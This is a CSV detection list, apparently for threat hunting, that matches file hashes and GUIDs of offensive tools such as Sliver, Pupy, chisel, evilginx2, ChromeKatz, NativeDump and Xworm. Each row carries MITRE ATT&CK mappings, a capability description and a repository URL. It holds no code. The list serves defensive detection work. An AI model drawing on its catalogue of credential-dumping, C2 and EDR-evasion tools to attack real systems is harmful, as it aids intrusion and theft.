"*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*",".{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0*",".{0,1000}234208515c308c4f71b418b498fd8674f60e2e2e70049e5b80e9615ce8a814d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a*",".{0,1000}2364f199ecada6b55a841e967f23934f3da7c22060003d96874bd9b05c28209a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE*",".{0,1000}2366491D74D80C76F75A7F84ABF82C1E88518A615CB2332FDCC846181F60AEAE.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00*",".{0,1000}237ee4007c3014829ab2635b0caa1ee4c89c3cbf71e43e76b3c1e2da0931aa00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d*",".{0,1000}237f52a3509094464bb92f82a4908a60c7a4cc9db9748f0cc254e75311bb8b0d.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a*",".{0,1000}238214970b5fba5a7eab8d9fb50c79da888018ff2a63ad49d1114b8d478d559a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*23975ac9-f51c-443a-8318-db006fd83100*",".{0,1000}23975ac9\-f51c\-443a\-8318\-db006fd83100.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8*",".{0,1000}2398f4a8e53345325f44bdd9f0cc7401bd9025d736c6d43b372f4dea77bf75b8.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4*",".{0,1000}23ae98fd603067f7325d89af5ed67ccee713397c2fed01ac736711a1b32e28d4.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2*",".{0,1000}23b828513db75348a8fcadd5db45d1593a5786a02b7efc1f6afb732db7ee97f2.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba*",".{0,1000}23c71cff513e2be636c1084f3c8646f9601eef18b83a8010c84e824e5fd9ffba.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*",".{0,1000}23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681*",".{0,1000}23ed5325043d0b9e7a9115792b12817cec836ba09e5af2aab3408606da729681.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338*",".{0,1000}241390219a0a773463601ca68b77af97453c20af00a66492a7a78c04d481d338.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*",".{0,1000}2419CEDC\-BF3A\-4D8D\-98F7\-6403415BEEA4.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244*",".{0,1000}2443660c8c3e8fcf80e028c6417a0110fde1f3a0961f70ffb960cbf64958e244.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b*",".{0,1000}24683c103edd19d58c02b001521660f0eae642200ad42454ae810bd7aefaf46b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8*",".{0,1000}2476217e429b83ee5584cd469558a374e054a604929150314e671f140f5d55c8.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d*",".{0,1000}247b2e43787899a0235e4c0e97d819f0e05d3403c30e2d87c8b0a8ca80a74e8d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278*",".{0,1000}247f15b5f3b38c9cf825f0df792e38e68fe4d69a72d21f596b9b73f570408278.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c*",".{0,1000}24b3db5da23d7a56cfff2480ff4fb63ccb8fad4522c490b4478a22711a3ffa1c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7*",".{0,1000}24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc*",".{0,1000}25125be2945ae98284abb64b279fe13021d1d02895b85a4e02a4fcd6ec8415cc.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629*",".{0,1000}2532d6935c32487a273e2f360f73df80c2a9f57620c865d8cc10b9ccf7a9d629.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098*",".{0,1000}254389e27339fd66920dd72f3ad07fe2e220f6b0cbea8032cf0b1d8285a7b098.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063*",".{0,1000}2553a72abc7f19fbd345e3e85fd73aa883d062e893ed4f7b47ffd7648c16a063.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c*",".{0,1000}25564409a011c563e9623b376593512115515704a5ed932dd18c20a040c8640c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07*",".{0,1000}2557d33f3a8599158820c409813b53a521cb3d0993352cd45b75f80eecd33f07.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5*",".{0,1000}2562c158d4f10ab67c20710da74463876e093473b56e7e1900a163133c1765b5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17*",".{0,1000}25861c1cc31e530c5f8162e78585f40697c28164fd3c561d3d1a31442ee1ec17.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb*",".{0,1000}25879dae8a91b9cb647c49ace109e948db08e6198565f167233a45fb14bfe5bb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2589213f0c51583dcbaacbe0005e5908*",".{0,1000}2589213f0c51583dcbaacbe0005e5908.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343*",".{0,1000}25aac4494a46799c4755d9bda39314d628134ee58dd6f724ee905373c3600343.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81*",".{0,1000}25c0d247d2a85d8372a542255d8ef45a41f6b43633b0a6869b62cab393490d81.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754*",".{0,1000}25d4635f8b5fea969f8c93a459f6fd0b0e333150254df3fc8963a7d19dd9a754.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962*",".{0,1000}25d74d144c6c9bfd48b8746e20868ac4d699d4514baa136e53ee5f60ed02b962.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5*",".{0,1000}25ec3ba7a4464210dd357b8454807c4163e761a46ccaa4bdd0b6c77e6b065fa5.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560*",".{0,1000}26085f4768e13063e5dde27f0e313854ce91aa032a7b26d4f57ebc03a6628560.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38*",".{0,1000}2609239cc8bc517f684285133622e8b11192fb456e2dc2937aa2c6c2379a9d38.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52*",".{0,1000}2611455f4d60bc80f43cb13f480c6bee70497fffea48ed5c0b7d67e7fce33a52.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*261f880e-4bee-428d-9f64-c29292002c19*",".{0,1000}261f880e\-4bee\-428d\-9f64\-c29292002c19.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326*",".{0,1000}26311efd632bf07e682b31290fb2815b92e6d7880d21d9b7e87ea1a08c0b4326.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da*",".{0,1000}2659c2d40606e2b088c3bbd6fd6a293692ac7f219221844071abf434a638e1da.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*2661F29C-69F5-4010-9198-A418C061DD7C*",".{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","N/A","10","2","156","50","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z" "*26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9*",".{0,1000}26695658d9cd9108527921dc351de3b717d37d849d0390ad7b9a6f0bb4d474a9.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" 